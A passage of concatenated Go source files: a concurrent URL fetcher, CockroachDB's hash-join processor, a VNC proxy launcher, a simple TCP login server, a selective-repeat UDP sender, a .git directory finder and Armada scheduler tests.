	ctype := resp.Header.Get("content-type")
	fmt.Printf("%s -> %s\n", url, ctype)
}
// main concurrently fetches the content type of a fixed set of URLs and
// waits for every fetch to complete before printing the end banner.
func main() {
	fmt.Println("========Start=========")
	urls := []string{
		"https://golang.org",
		"https://api.github.com",
		"https://httpbin.org/xml",
	}
	// The original also ran a first, untracked `go returnType(url)` loop
	// before this one: those goroutines were never waited on, raced with
	// process exit, and duplicated every request. The WaitGroup loop is
	// now the single launcher, so each URL is fetched exactly once and
	// every goroutine is accounted for.
	var wg sync.WaitGroup
	for _, url := range urls {
		wg.Add(1)
		go func(url string) {
			defer wg.Done() // deferred so a panic in returnType can't wedge Wait
			returnType(url)
		}(url)
	}
	wg.Wait()
	fmt.Println("========End=========")
}
|
// Copyright 2016 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package rowexec
import (
"context"
"github.com/cockroachdb/cockroach/pkg/sql/catalog/descpb"
"github.com/cockroachdb/cockroach/pkg/sql/execinfra"
"github.com/cockroachdb/cockroach/pkg/sql/execinfrapb"
"github.com/cockroachdb/cockroach/pkg/sql/rowcontainer"
"github.com/cockroachdb/cockroach/pkg/sql/rowenc"
"github.com/cockroachdb/cockroach/pkg/util/cancelchecker"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/mon"
"github.com/cockroachdb/cockroach/pkg/util/optional"
"github.com/cockroachdb/errors"
)
// hashJoinerState represents the state of the hash join processor.
type hashJoinerState int

const (
	// hjStateUnknown is the zero/terminal value; it is returned by the
	// state handlers when the joiner is draining or has errored.
	hjStateUnknown hashJoinerState = iota
	// hjBuilding represents the state the hashJoiner is in when it is building
	// the hash table based on the equality columns of the rows from the right
	// side.
	hjBuilding
	// hjReadingLeftSide represents the state the hashJoiner is in when it
	// reads rows from the left side.
	hjReadingLeftSide
	// hjProbingRow represents the state the hashJoiner is in when it uses a
	// row read in hjReadingLeftSide to probe the stored hash map with.
	hjProbingRow
	// hjEmittingRightUnmatched represents the state the hashJoiner is in when
	// it is emitting unmatched rows from the right side after having consumed
	// the left side. This only happens when executing a FULL OUTER, RIGHT
	// OUTER, and RIGHT ANTI joins.
	hjEmittingRightUnmatched
)
// hashJoiner performs a hash join. There is no guarantee on the output
// ordering.
type hashJoiner struct {
	joinerBase

	// runningState drives the state machine in Next; see hashJoinerState.
	runningState hashJoinerState

	// diskMonitor accounts for the hash table's disk usage when it spills.
	diskMonitor *mon.BytesMonitor

	// leftSource feeds probe rows; rightSource feeds the build side.
	leftSource, rightSource execinfra.RowSource

	// nullEquality indicates that NULL = NULL should be considered true. Used for
	// INTERSECT and EXCEPT.
	nullEquality bool

	// hashTable stores the right-side rows, spilling to disk when the
	// memory limit is exceeded.
	hashTable *rowcontainer.HashDiskBackedRowContainer

	// probingRowState is state used when hjProbingRow.
	probingRowState struct {
		// row is the row being probed with.
		row rowenc.EncDatumRow
		// iter is an iterator over the bucket that matches row on the equality
		// columns.
		iter rowcontainer.RowMarkerIterator
		// matched represents whether any row that matches row on equality columns
		// has also passed the ON condition.
		matched bool
	}

	// emittingRightUnmatchedState is used when hjEmittingRightUnmatched.
	emittingRightUnmatchedState struct {
		iter rowcontainer.RowIterator
	}

	// Context cancellation checker.
	cancelChecker *cancelchecker.CancelChecker
}
// Compile-time interface conformance checks.
var _ execinfra.Processor = &hashJoiner{}
var _ execinfra.RowSource = &hashJoiner{}
var _ execinfra.OpNode = &hashJoiner{}

// hashJoinerProcName names this processor in tracing spans.
const hashJoinerProcName = "hash joiner"
// newHashJoiner creates a new hash join processor. The right source is
// the build side and the left source is the probe side; the returned
// joiner is ready to Start.
func newHashJoiner(
	flowCtx *execinfra.FlowCtx,
	processorID int32,
	spec *execinfrapb.HashJoinerSpec,
	leftSource execinfra.RowSource,
	rightSource execinfra.RowSource,
	post *execinfrapb.PostProcessSpec,
	output execinfra.RowReceiver,
) (*hashJoiner, error) {
	h := &hashJoiner{
		leftSource:  leftSource,
		rightSource: rightSource,
		// Set-operation joins (INTERSECT/EXCEPT) treat NULL = NULL as true.
		nullEquality: spec.Type.IsSetOpJoin(),
	}
	if err := h.joinerBase.init(
		h,
		flowCtx,
		processorID,
		leftSource.OutputTypes(),
		rightSource.OutputTypes(),
		spec.Type,
		spec.OnExpr,
		spec.LeftEqColumns,
		spec.RightEqColumns,
		false, /* outputContinuationColumn */
		post,
		output,
		execinfra.ProcStateOpts{
			InputsToDrain: []execinfra.RowSource{h.leftSource, h.rightSource},
			TrailingMetaCallback: func() []execinfrapb.ProducerMetadata {
				h.close()
				return nil
			},
		},
	); err != nil {
		return nil, err
	}
	ctx := h.FlowCtx.EvalCtx.Ctx()
	// Limit the memory use by creating a child monitor with a hard limit.
	// The hashJoiner will overflow to disk if this limit is not enough.
	h.MemMonitor = execinfra.NewLimitedMonitor(ctx, flowCtx.EvalCtx.Mon, flowCtx.Cfg, "hashjoiner-limited")
	h.diskMonitor = execinfra.NewMonitor(ctx, flowCtx.DiskMonitor, "hashjoiner-disk")
	h.hashTable = rowcontainer.NewHashDiskBackedRowContainer(
		h.EvalCtx, h.MemMonitor, h.diskMonitor, h.FlowCtx.Cfg.TempStorage,
	)
	// If the trace is recording, instrument the hashJoiner to collect stats.
	if execinfra.ShouldCollectStats(ctx, flowCtx) {
		h.leftSource = newInputStatCollector(h.leftSource)
		h.rightSource = newInputStatCollector(h.rightSource)
		h.ExecStatsForTrace = h.execStatsForTrace
	}
	// The hash table is keyed on the right-side equality columns; marking
	// is enabled only for join types that need to track matched rows.
	return h, h.hashTable.Init(
		h.Ctx,
		shouldMarkRightSide(h.joinType),
		h.rightSource.OutputTypes(),
		h.eqCols[rightSide],
		h.nullEquality,
	)
}
// Start is part of the RowSource interface. It starts both inputs and
// moves the state machine into hjBuilding.
func (h *hashJoiner) Start(ctx context.Context) {
	ctx = h.StartInternal(ctx, hashJoinerProcName)
	h.leftSource.Start(ctx)
	h.rightSource.Start(ctx)
	h.cancelChecker = cancelchecker.NewCancelChecker(ctx)
	h.runningState = hjBuilding
}
// Next is part of the RowSource interface. It steps the state machine
// until a row or metadata is produced, then routes the result through
// the post-processing helper.
func (h *hashJoiner) Next() (rowenc.EncDatumRow, *execinfrapb.ProducerMetadata) {
	for h.State == execinfra.StateRunning {
		var row rowenc.EncDatumRow
		var meta *execinfrapb.ProducerMetadata
		switch h.runningState {
		case hjBuilding:
			h.runningState, row, meta = h.build()
		case hjReadingLeftSide:
			h.runningState, row, meta = h.readLeftSide()
		case hjProbingRow:
			h.runningState, row, meta = h.probeRow()
		case hjEmittingRightUnmatched:
			h.runningState, row, meta = h.emitRightUnmatched()
		default:
			log.Fatalf(h.Ctx, "unsupported state: %d", h.runningState)
		}
		// A state transition that produced nothing: keep stepping.
		if row == nil && meta == nil {
			continue
		}
		if meta != nil {
			return nil, meta
		}
		// ProcessRowHelper may filter the row out (post-processing), in
		// which case we loop for the next candidate.
		if outRow := h.ProcessRowHelper(row); outRow != nil {
			return outRow, nil
		}
	}
	return nil, h.DrainHelper()
}
// ConsumerClosed is part of the RowSource interface. It releases all
// resources; no more rows will be requested.
func (h *hashJoiner) ConsumerClosed() {
	h.close()
}
// build consumes the entire right side into the hash table, forwarding
// any metadata and directly-emittable rows (NULL-in-equality-column rows
// of outer joins) as they appear. It transitions to hjReadingLeftSide
// when the right side is exhausted, or drains on error/short-circuit.
func (h *hashJoiner) build() (hashJoinerState, rowenc.EncDatumRow, *execinfrapb.ProducerMetadata) {
	for {
		row, meta, emitDirectly, err := h.receiveNext(rightSide)
		if err != nil {
			h.MoveToDraining(err)
			return hjStateUnknown, nil, h.DrainHelper()
		} else if meta != nil {
			if meta.Err != nil {
				h.MoveToDraining(nil /* err */)
				return hjStateUnknown, nil, meta
			}
			return hjBuilding, nil, meta
		} else if emitDirectly {
			return hjBuilding, row, nil
		}
		if row == nil {
			// Right side has been fully consumed, so move on to
			// hjReadingLeftSide. If the hash table is empty, we might be able
			// to short-circuit.
			if h.hashTable.IsEmpty() && h.joinType.IsEmptyOutputWhenRightIsEmpty() {
				h.MoveToDraining(nil /* err */)
				return hjStateUnknown, nil, h.DrainHelper()
			}
			// If hashTable is in-memory, pre-reserve the memory needed to mark.
			if err = h.hashTable.ReserveMarkMemoryMaybe(h.Ctx); err != nil {
				h.MoveToDraining(err)
				return hjStateUnknown, nil, h.DrainHelper()
			}
			return hjReadingLeftSide, nil, nil
		}
		err = h.hashTable.AddRow(h.Ctx, row)
		// Regardless of the underlying row container (disk backed or in-memory
		// only), we cannot do anything about an error if it occurs.
		if err != nil {
			h.MoveToDraining(err)
			return hjStateUnknown, nil, h.DrainHelper()
		}
	}
}
// readLeftSide pulls the next probe row from the left input. On a row it
// primes probingRowState (reusing the bucket iterator when possible) and
// transitions to hjProbingRow; when the left side is exhausted it either
// moves to hjEmittingRightUnmatched or finishes.
func (h *hashJoiner) readLeftSide() (
	hashJoinerState,
	rowenc.EncDatumRow,
	*execinfrapb.ProducerMetadata,
) {
	row, meta, emitDirectly, err := h.receiveNext(leftSide)
	if err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	} else if meta != nil {
		if meta.Err != nil {
			h.MoveToDraining(nil /* err */)
			return hjStateUnknown, nil, meta
		}
		return hjReadingLeftSide, nil, meta
	} else if emitDirectly {
		return hjReadingLeftSide, row, nil
	}
	if row == nil {
		// The left side has been fully consumed. Move on to
		// hjEmittingRightUnmatched if unmatched rows on the right side need to
		// be emitted, otherwise finish.
		if shouldEmitUnmatchedRow(rightSide, h.joinType) {
			i := h.hashTable.NewUnmarkedIterator(h.Ctx)
			i.Rewind()
			h.emittingRightUnmatchedState.iter = i
			return hjEmittingRightUnmatched, nil, nil
		}
		h.MoveToDraining(nil /* err */)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	// Probe with this row. Get the iterator over the matching bucket ready for
	// hjProbingRow.
	h.probingRowState.row = row
	h.probingRowState.matched = false
	if h.probingRowState.iter == nil {
		// First probe: allocate the bucket iterator once, then Reset it for
		// subsequent probe rows.
		i, err := h.hashTable.NewBucketIterator(h.Ctx, row, h.eqCols[leftSide])
		if err != nil {
			h.MoveToDraining(err)
			return hjStateUnknown, nil, h.DrainHelper()
		}
		h.probingRowState.iter = i
	} else {
		if err := h.probingRowState.iter.Reset(h.Ctx, row); err != nil {
			h.MoveToDraining(err)
			return hjStateUnknown, nil, h.DrainHelper()
		}
	}
	h.probingRowState.iter.Rewind()
	return hjProbingRow, nil, nil
}
// probeRow advances the current probe by one candidate from the matching
// bucket: it renders the left/right pair, applies the ON condition,
// marks right-side rows where the join type requires it, and decides both
// whether to emit and which state to transition to. At the end of the
// bucket it emits the unmatched left row if the join type calls for it.
func (h *hashJoiner) probeRow() (
	hashJoinerState,
	rowenc.EncDatumRow,
	*execinfrapb.ProducerMetadata,
) {
	i := h.probingRowState.iter
	if ok, err := i.Valid(); err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	} else if !ok {
		// In this case we have reached the end of the matching bucket. Check
		// if any rows passed the ON condition. If they did, move back to
		// hjReadingLeftSide to get the next probe row.
		if h.probingRowState.matched {
			return hjReadingLeftSide, nil, nil
		}
		// If not, this probe row is unmatched. Check if it needs to be emitted.
		if renderedRow, shouldEmit := h.shouldEmitUnmatched(
			h.probingRowState.row, leftSide,
		); shouldEmit {
			return hjReadingLeftSide, renderedRow, nil
		}
		return hjReadingLeftSide, nil, nil
	}
	if err := h.cancelChecker.Check(); err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	leftRow := h.probingRowState.row
	rightRow, err := i.Row()
	if err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	// Advance past this candidate no matter which return path is taken.
	defer i.Next()
	var renderedRow rowenc.EncDatumRow
	renderedRow, err = h.render(leftRow, rightRow)
	if err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	// If the ON condition failed, renderedRow is nil.
	if renderedRow == nil {
		return hjProbingRow, nil, nil
	}
	h.probingRowState.matched = true
	shouldEmit := true
	if shouldMarkRightSide(h.joinType) {
		if i.IsMarked(h.Ctx) {
			switch h.joinType {
			case descpb.RightSemiJoin:
				// The row from the right already had a match and was emitted
				// previously, so we don't emit it for the second time.
				shouldEmit = false
			case descpb.IntersectAllJoin:
				// The row from the right has already been used for the
				// intersection, so we cannot use it again.
				shouldEmit = false
			case descpb.ExceptAllJoin:
				// The row from the right has already been used for the except
				// operation, so we cannot use it again. However, we need to
				// continue probing the same row from the left in order to see
				// whether we have a corresponding unmarked row from the right.
				h.probingRowState.matched = false
			}
		} else if err := i.Mark(h.Ctx); err != nil {
			h.MoveToDraining(err)
			return hjStateUnknown, nil, h.DrainHelper()
		}
	}
	nextState := hjProbingRow
	switch h.joinType {
	case descpb.LeftSemiJoin:
		// We can short-circuit iterating over the remaining matching rows from
		// the right, so we'll transition to the next row from the left.
		nextState = hjReadingLeftSide
	case descpb.LeftAntiJoin, descpb.RightAntiJoin:
		// We found a matching row, so we don't emit it in case of an anti join.
		shouldEmit = false
	case descpb.ExceptAllJoin:
		// We're definitely not emitting the combination of the current left
		// and right rows right now. If the current right row has already been
		// used, then h.probingRowState.matched is set to false, and we might
		// emit the current left row if we're at the end of the bucket on the
		// next probeRow() call.
		shouldEmit = false
		if h.probingRowState.matched {
			// We have found a match for the current row on the left, so we'll
			// transition to the next one.
			nextState = hjReadingLeftSide
		}
	case descpb.IntersectAllJoin:
		if shouldEmit {
			// We have found a match for the current row on the left, so we'll
			// transition to the next row from the left.
			nextState = hjReadingLeftSide
		}
	}
	if shouldEmit {
		return nextState, renderedRow, nil
	}
	return nextState, nil, nil
}
// emitRightUnmatched walks the unmarked-rows iterator set up by
// readLeftSide, rendering one unmatched right-side row per call, and
// drains when the iterator is exhausted.
func (h *hashJoiner) emitRightUnmatched() (
	hashJoinerState,
	rowenc.EncDatumRow,
	*execinfrapb.ProducerMetadata,
) {
	i := h.emittingRightUnmatchedState.iter
	if ok, err := i.Valid(); err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	} else if !ok {
		// Done.
		h.MoveToDraining(nil /* err */)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	if err := h.cancelChecker.Check(); err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	row, err := i.Row()
	if err != nil {
		h.MoveToDraining(err)
		return hjStateUnknown, nil, h.DrainHelper()
	}
	// Advance past this row regardless of the return path.
	defer i.Next()
	return hjEmittingRightUnmatched, h.renderUnmatchedRow(row, rightSide), nil
}
// close releases the hash table, both iterators and the memory/disk
// monitors. InternalClose makes this idempotent: the body runs only on
// the first call.
func (h *hashJoiner) close() {
	if h.InternalClose() {
		h.hashTable.Close(h.Ctx)
		if h.probingRowState.iter != nil {
			h.probingRowState.iter.Close()
		}
		if h.emittingRightUnmatchedState.iter != nil {
			h.emittingRightUnmatchedState.iter.Close()
		}
		h.MemMonitor.Stop(h.Ctx)
		if h.diskMonitor != nil {
			h.diskMonitor.Stop(h.Ctx)
		}
	}
}
// receiveNext reads from the source specified by side and returns the next row
// or metadata to be processed by the hashJoiner. Unless h.nullEquality is true,
// rows with NULLs in their equality columns are only returned if the joinType
// specifies that unmatched rows should be returned for the given side. In this
// case, a rendered row and true is returned, notifying the caller that the
// returned row may be emitted directly.
func (h *hashJoiner) receiveNext(
	side joinSide,
) (rowenc.EncDatumRow, *execinfrapb.ProducerMetadata, bool, error) {
	source := h.leftSource
	if side == rightSide {
		source = h.rightSource
	}
	for {
		if err := h.cancelChecker.Check(); err != nil {
			return nil, nil, false, err
		}
		row, meta := source.Next()
		if meta != nil {
			return nil, meta, false, nil
		} else if row == nil {
			// Source exhausted.
			return nil, nil, false, nil
		}
		// We make the explicit check for whether or not the row contained a NULL value
		// on an equality column. The reasoning here is because of the way we expect
		// NULL equality checks to behave (i.e. NULL != NULL) and the fact that we
		// use the encoding of any given row as key into our bucket. Thus if we
		// encountered a NULL row when building the hashmap we have to store in
		// order to use it for RIGHT OUTER joins but if we encounter another
		// NULL row when going through the left stream (probing phase), matching
		// this with the first NULL row would be incorrect.
		//
		// If we have have the following:
		// CREATE TABLE t(x INT); INSERT INTO t(x) VALUES (NULL);
		// |  x   |
		// ------
		// | NULL |
		//
		// For the following query:
		// SELECT * FROM t AS a FULL OUTER JOIN t AS b USING(x);
		//
		// We expect:
		// |  x   |
		// ------
		// | NULL |
		// | NULL |
		//
		// The following examples illustrates the behavior when joining on two
		// or more columns, and only one of them contains NULL.
		// If we have have the following:
		// CREATE TABLE t(x INT, y INT);
		// INSERT INTO t(x, y) VALUES (44,51), (NULL,52);
		// |  x   |  y   |
		// ------
		// |  44  |  51  |
		// | NULL |  52  |
		//
		// For the following query:
		// SELECT * FROM t AS a FULL OUTER JOIN t AS b USING(x, y);
		//
		// We expect:
		// |  x   |  y   |
		// ------
		// |  44  |  51  |
		// | NULL |  52  |
		// | NULL |  52  |
		hasNull := false
		for _, c := range h.eqCols[side] {
			if row[c].IsNull() {
				hasNull = true
				break
			}
		}
		// row has no NULLs in its equality columns (or we are considering NULLs to
		// be equal), so it might match a row from the other side.
		if !hasNull || h.nullEquality {
			return row, nil, false, nil
		}
		if renderedRow, shouldEmit := h.shouldEmitUnmatched(row, side); shouldEmit {
			return renderedRow, nil, true, nil
		}
		// If this point is reached, row had NULLs in its equality columns but
		// should not be emitted. Throw it away and get the next row.
	}
}
// shouldEmitUnmatched returns whether this row should be emitted if it doesn't
// match. If this is the case, a rendered row ready for emitting is returned as
// well.
func (h *hashJoiner) shouldEmitUnmatched(
	row rowenc.EncDatumRow, side joinSide,
) (rowenc.EncDatumRow, bool) {
	if shouldEmitUnmatchedRow(side, h.joinType) {
		return h.renderUnmatchedRow(row, side), true
	}
	return nil, false
}
// execStatsForTrace implements ProcessorBase.ExecStatsForTrace. It
// returns nil unless both inputs were wrapped in stat collectors (see
// newHashJoiner), in which case it reports per-input stats plus peak
// memory and disk usage.
func (h *hashJoiner) execStatsForTrace() *execinfrapb.ComponentStats {
	lis, ok := getInputStats(h.leftSource)
	if !ok {
		return nil
	}
	ris, ok := getInputStats(h.rightSource)
	if !ok {
		return nil
	}
	return &execinfrapb.ComponentStats{
		Inputs: []execinfrapb.InputStats{lis, ris},
		Exec: execinfrapb.ExecStats{
			MaxAllocatedMem:  optional.MakeUint(uint64(h.MemMonitor.MaximumBytes())),
			MaxAllocatedDisk: optional.MakeUint(uint64(h.diskMonitor.MaximumBytes())),
		},
		Output: h.Out.Stats(),
	}
}
// shouldMarkRightSide reports whether the given join type requires marking
// the rows on the right side that matched.
func shouldMarkRightSide(joinType descpb.JoinType) bool {
	switch joinType {
	case descpb.FullOuterJoin, descpb.RightOuterJoin, descpb.RightAntiJoin:
		// Right-side rows are marked so the unmatched ones can be iterated
		// over in the hjEmittingRightUnmatched state.
		return true
	case descpb.RightSemiJoin:
		// Marks record that an output row was already emitted for the row.
		return true
	case descpb.IntersectAllJoin, descpb.ExceptAllJoin:
		// The row containers cannot delete rows, so marks are reused to
		// simulate "deleted" rows for set-operation joins.
		return true
	}
	return false
}
// ChildCount is part of the execinfra.OpNode interface.
// It reports 2 only when both inputs are OpNodes, 0 otherwise.
func (h *hashJoiner) ChildCount(verbose bool) int {
	_, leftIsNode := h.leftSource.(execinfra.OpNode)
	_, rightIsNode := h.rightSource.(execinfra.OpNode)
	if leftIsNode && rightIsNode {
		return 2
	}
	return 0
}
// Child is part of the execinfra.OpNode interface.
// It panics if the requested input is not an OpNode or nth is out of range.
func (h *hashJoiner) Child(nth int, verbose bool) execinfra.OpNode {
	switch nth {
	case 0:
		n, ok := h.leftSource.(execinfra.OpNode)
		if !ok {
			panic("left input to hashJoiner is not an execinfra.OpNode")
		}
		return n
	case 1:
		n, ok := h.rightSource.(execinfra.OpNode)
		if !ok {
			panic("right input to hashJoiner is not an execinfra.OpNode")
		}
		return n
	default:
		panic(errors.AssertionFailedf("invalid index %d", nth))
	}
}
|
package main
import "vncproxy/proxy"
import "flag"
import "vncproxy/logger"
import "os"
// main parses the proxy flags, validates them and starts the VNC proxy.
func main() {
	var tcpPort = flag.String("tcpPort", "", "tcp port")
	var wsPort = flag.String("wsPort", "", "websocket port")
	var vncPass = flag.String("vncPass", "", "password on incoming vnc connections to the proxy, defaults to no password")
	var recordDir = flag.String("recDir", "", "path to save FBS recordings WILL NOT RECORD if not defined.")
	var targetVncPort = flag.String("targPort", "", "target vnc server port")
	var targetVncHost = flag.String("targHost", "", "target vnc server host")
	var targetVncPass = flag.String("targPass", "", "target vnc password")
	var logLevel = flag.String("logLevel", "info", "change logging level")
	flag.Parse()
	logger.SetLogLevel(*logLevel)

	// At least one listener (tcp or websocket) must be configured.
	if *tcpPort == "" && *wsPort == "" {
		logger.Error("no listening port defined")
		flag.Usage()
		os.Exit(1)
	}
	if *targetVncPort == "" {
		logger.Error("no target vnc server port defined")
		flag.Usage()
		os.Exit(1)
	}
	if *vncPass == "" {
		logger.Warn("proxy will have no password")
	}
	if *recordDir == "" {
		logger.Warn("FBS recording is turned off")
	}

	// Build the listening URLs. An empty URL disables the corresponding
	// listener. Previously the websocket URL was built unconditionally,
	// which produced the bogus address "http://0.0.0.0:/" whenever -wsPort
	// was unset, so the ws listener could never actually be disabled.
	// Note: the flags are already strings; the string(...) conversions the
	// original code applied were no-ops and have been removed.
	tcpUrl := ""
	if *tcpPort != "" {
		tcpUrl = ":" + *tcpPort
	}
	wsUrl := ""
	if *wsPort != "" {
		wsUrl = "http://0.0.0.0:" + *wsPort + "/"
	}

	// Renamed from "proxy" to avoid shadowing the imported proxy package.
	vncProxy := &proxy.VncProxy{
		WsListeningUrl:   wsUrl,      // empty = not listening on ws
		RecordingDir:     *recordDir, // empty = no recording
		TcpListeningUrl:  tcpUrl,
		ProxyVncPassword: *vncPass, // empty = no auth
		SingleSession: &proxy.VncSession{
			TargetHostname: *targetVncHost,
			TargetPort:     *targetVncPort,
			TargetPassword: *targetVncPass,
			ID:             "dummySession",
			Status:         proxy.SessionStatusInit,
			Type:           proxy.SessionTypeRecordingProxy,
		}, // used when not using sessions
		UsingSessions: false, // false = single session, defined in the var above
	}
	vncProxy.StartListening()
}
|
package main
import (
"fmt"
"net"
"go_code/restudy/netstudy/netstudy03/common/utils"
"go_code/restudy/netstudy/netstudy03/common/message"
"go_code/restudy/netstudy/netstudy03/server/process"
)
// main starts a TCP server on :8888 and handles each client connection in
// its own goroutine.
func main() {
	listen, err := net.Listen("tcp", ":8888")
	if err != nil {
		fmt.Println("服务器创建监听失败", err)
		return
	}
	// Release the listener socket if the accept loop ever exits
	// (previously the listener was never closed).
	defer listen.Close()
	for {
		conn, err := listen.Accept()
		if err != nil {
			fmt.Println("服务器获取客户端连接失败", err)
			continue
		}
		// Serve each client concurrently.
		go dial(conn)
	}
}
func dial(conn net.Conn) {
var tf *utils.Transfer = &utils.Transfer{
Conn : conn,
Buf : make([]byte, 8192),
}
mes := tf.ReadPkg()
switch mes.MsgType {
case message.LoginMesType:
var up *process.UserProcess = &process.UserProcess{
Conn : conn,
}
up.Login(mes)
}
} |
package server
import (
"net"
"time"
socket "github.com/mohamedmahmoud97/Zuper-UDP/socket"
)
// SR is the algorithm of selective-repeat.
//
// packets holds the pre-built chunks to transmit, noChunks is how many of
// them there are, window is the send-window size, plp is the packet-loss
// probability passed through to sendWinPack, and AckCheck delivers received
// ack sequence numbers. The quit channel carries timed-out sequence numbers
// (presumably produced by sendWinPack/resendPck — confirm).
func SR(packets []socket.Packet, noChunks int, conn *net.UDPConn, addr *net.UDPAddr, window int, plp float32, AckCheck chan uint32) {
	// ackPack tracks per-chunk state: 0 = unacked, 2 = acked; the value 1 is
	// tested below and presumably means "sent, awaiting ack" (set elsewhere,
	// e.g. by sendWinPack — confirm). pckTimer records per-packet send times.
	var ackPack = make(map[int]int)
	var pckTimer = make(map[int]time.Time)
	start := 0
	quit := make(chan uint32, window)
	//make all the chunks have value 0 as unack
	for i := 0; i < noChunks; i++ {
		ackPack[i] = 0
	}
	//send the first packets with the window size
	sendWinPack(start, window, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
	//loop until all the packets are sent and received their ack
	// NOTE(review): getNextStart below can return -1; since -1 < noChunks the
	// loop keeps running in that case — verify this is the intended way to
	// drain the remaining acks.
	for (start) < noChunks {
		// check if time exceeded or we received a new ack packet
		pcktseqno, goResend := resendPck(quit, AckCheck)
		ackpckt := int(pcktseqno)
		if !goResend {
			if ackpckt == start {
				// The window base was acked: mark it and slide the window
				// forward to the next unacked chunk.
				ackPack[ackpckt] = 2
				time.Sleep(1 * time.Millisecond)
				start = getNextStart(start, noChunks, ackPack)
				if start != -1 {
					sendWinPack(start, window, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
				}
			} else if ackPack[ackpckt] == 1 {
				// An in-flight chunk was acked out of order: mark it and,
				// if there is still room within the window, send one more.
				ackPack[ackpckt] = 2
				time.Sleep(1 * time.Millisecond)
				nextUnSent := getNextStart(ackpckt, noChunks, ackPack)
				if nextUnSent < start+4 && nextUnSent != -1 {
					sendWinPack(start, 1, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
				}
			} else if ackPack[ackpckt] == 2 {
				// Duplicate ack for an already-acked chunk: ignore it.
			}
		} else {
			// Timeout path: re-send unless the chunk was acked meanwhile.
			if ackPack[ackpckt] != 2 {
				ackPack[ackpckt] = 0
				sendWinPack(start, 1, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
			}
		}
	}
	// NOTE(review): dead store — start is a local and the function returns
	// right after this line.
	start = 0
}
|
package main
import (
"fmt"
"io/ioutil"
"log"
"os"
"path"
"path/filepath"
"sync"
"time"
)
// main lists the entries of the current directory and walks each one
// concurrently, waiting for every walk to complete.
func main() {
	entries, err := ioutil.ReadDir(".")
	if err != nil {
		log.Fatal(err)
	}
	var wg sync.WaitGroup
	for _, entry := range entries {
		wg.Add(1)
		go walk(entry.Name(), &wg)
	}
	wg.Wait()
}
// walk runs filepath.Walk on root, reports any walk error together with the
// current working directory, and prints how long the walk took in
// milliseconds. The WaitGroup is always signalled, even if the walk panics.
func walk(root string, wg *sync.WaitGroup) {
	// Deferred so the WaitGroup cannot be leaked on a panic; previously
	// Done() was only reached on the normal return path.
	defer wg.Done()
	start := time.Now()
	if err := filepath.Walk(root, found); err != nil {
		if wd, wdErr := os.Getwd(); wdErr == nil {
			fmt.Printf("error walking the path %q: %v\n", wd, err)
		}
	}
	// time.Since is the idiomatic form of time.Now().Sub(start).
	elapsed := time.Since(start)
	fmt.Printf("%s: %d\n", root, elapsed.Milliseconds())
}
func found(dir string, info os.FileInfo, err error) error {
if err != nil {
fmt.Printf("prevent panic by handling failure accessing a path %q: %v\n", dir, err)
return err
}
if info.IsDir() && info.Name() == ".git" {
fmt.Println(path.Dir(dir))
}
return nil
}
|
package scheduling
import (
"testing"
"github.com/stretchr/testify/assert"
"k8s.io/apimachinery/pkg/api/resource"
"github.com/G-Research/armada/internal/common"
"github.com/G-Research/armada/pkg/api"
)
// 1 cpu per 1 Gb
// scarcity weights heterogeneous resources against each other:
// one CPU is treated as equivalent to one GiB of memory.
var scarcity = map[string]float64{"cpu": 1, "memory": 1.0 / (1024 * 1024 * 1024)}
// Test_sliceResources verifies that slicing favours the queue with the lowest
// current usage: q1 and q2 already use resources, q3 uses none.
func Test_sliceResources(t *testing.T) {
	q1 := &api.Queue{Name: "q1"}
	q2 := &api.Queue{Name: "q2"}
	q3 := &api.Queue{Name: "q3"}
	cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
	noResources := common.ComputeResources{}
	queuePriorities := map[*api.Queue]QueuePriorityInfo{
		q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
		q3: {Priority: 1, CurrentUsage: noResources},  // queue usage is 0
	}
	slices := sliceResource(scarcity, queuePriorities, common.ComputeResources{"cpu": resource.MustParse("8")}.AsFloat())
	// resulting usage ratio should be 4 : 4 : 4
	twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
	fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
	// assert.Equal takes (t, expected, actual); the arguments were previously
	// reversed, which garbles failure messages.
	assert.Equal(t, map[*api.Queue]common.ComputeResourcesFloat{q1: twoCpu, q2: twoCpu, q3: fourCpu}, slices)
}
// Test_sliceResources_highImbalance verifies that when one queue's usage far
// exceeds the available resource, the whole slice goes to the idle queue.
func Test_sliceResources_highImbalance(t *testing.T) {
	q1 := &api.Queue{Name: "q1"}
	q2 := &api.Queue{Name: "q2"}
	cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("10"), "memory": resource.MustParse("10Gi")}
	noResources := common.ComputeResources{}
	queuePriorities := map[*api.Queue]QueuePriorityInfo{
		q1: {Priority: 1, CurrentUsage: cpuAndMemory},
		q2: {Priority: 1, CurrentUsage: noResources},
	}
	slices := sliceResource(scarcity, queuePriorities, common.ComputeResources{"cpu": resource.MustParse("3")}.AsFloat())
	noCpu := common.ComputeResourcesFloat{"cpu": 0.0}
	allCpu := common.ComputeResourcesFloat{"cpu": 3.0}
	// assert.Equal takes (t, expected, actual).
	assert.Equal(t, map[*api.Queue]common.ComputeResourcesFloat{q1: noCpu, q2: allCpu}, slices)
}
